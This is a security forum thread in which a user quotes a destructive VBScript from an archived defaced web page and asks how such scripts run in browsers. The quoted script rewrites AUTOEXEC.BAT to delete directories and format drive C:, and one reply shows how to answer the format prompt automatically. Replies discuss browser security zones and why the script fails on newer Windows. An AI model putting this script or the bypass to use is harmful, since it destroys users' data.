Malicious script in regular html code
Results 1 to 9 of 9

Thread: Malicious script in regular html code

  1. #1
    Junior Member
    Join Date
    May 2004
    Posts
    8

    Malicious script in regular html code

    Take a look at this script:

    <script language="VBScript"><!--
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
    a.writeline ("copy c:\windows\command\deltree.* c:\")
    a.writeline ("copy c:\windows\command\format.* c:\")
    a.writeline ("cls")
    a.writeline ("Deltree /y windows")
    a.writeline ("cls")
    a.writeline ("Deltree /y meusdo~1")
    a.writeline ("cls")
    a.writeline ("Deltree /y arquiv~1")
    a.writeline ("@echo -=-=-=-=-=-=-=-Computer Hacked by [hacker!]-=-=-=-=-=-")
    a.writeline ("@echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-")
    a.writeline ("format c: /q")
    a.Close
    --></script>
    (Quoted because I didn't want to execute it, if such a thing could be possible:P

    I found it in at 2600's hacked pages archive. It was marked as "dangerous to view in IE".

    My question is easyt: is it that simple to execute malicious scripts on browsers?

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    If I'm not mistaken if you get this to run in the "Local Machine Zone" it'll work.

    http://msdn.microsoft.com/workshop/s...w/overview.asp
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Senior Member
    Join Date
    Apr 2004
    Posts
    1,130
    SirDice (as usual) is correct.
    That script cant run from internet zone - HOWEVER
    From time to time IE "popup" a new vulnerability on "cross zones" that creates "ways" to run thing from one zone on another zone...
    Meu sítio

    FORMAT C: Yes ...Yes??? ...Nooooo!!! ^C ^C ^C ^C ^C
    If I die before I sleep, I pray the Lord my soul to encrypt.
    If I die before I wake, I pray the Lord my soul to brake.

  4. #4
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Actually, It isn't going to do much on Win2k and I suspect WinXP either.

    Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........

    Badly written piece of crap? Absolutely!
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Originally posted here by Tiger Shark
    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........
    Easily defeated by creating a textfile with an "Y" in it and doing a
    Code:
    format c: /q < yes.txt
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  6. #6
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    [Easily defeated by creating a textfile with an "Y" in it and doing a[/quote]

    Undoubtedly..... So the author didn't really think this through did he.....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  7. #7
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Yeah. Oh well. At least Sigg3 learned something (I hope)

    Hehehe. There's more wrong with this script. It's kinda overkill. Why remove the windows dir if you're going to format the complete drive anyway



    Welcome to AO btw (I keep forgetting my manners )
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  8. #8
    Junior Member
    Join Date
    May 2004
    Posts
    8
    This was back in y2k, tho.
    Don't think 2600 would've posted a warning without a reason.

    Thanks for the replies, gentlemen.

  9. #9
    AO French Antique News Whore
    Join Date
    Aug 2001
    Posts
    2,126
    Originally posted here by Tiger Shark
    Actually, It isn't going to do much on Win2k and I suspect WinXP either.

    Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

    Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........

    Badly written piece of crap? Absolutely!
    True... Deltree is not include in 2000/XP.
    -Simon \"SDK\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides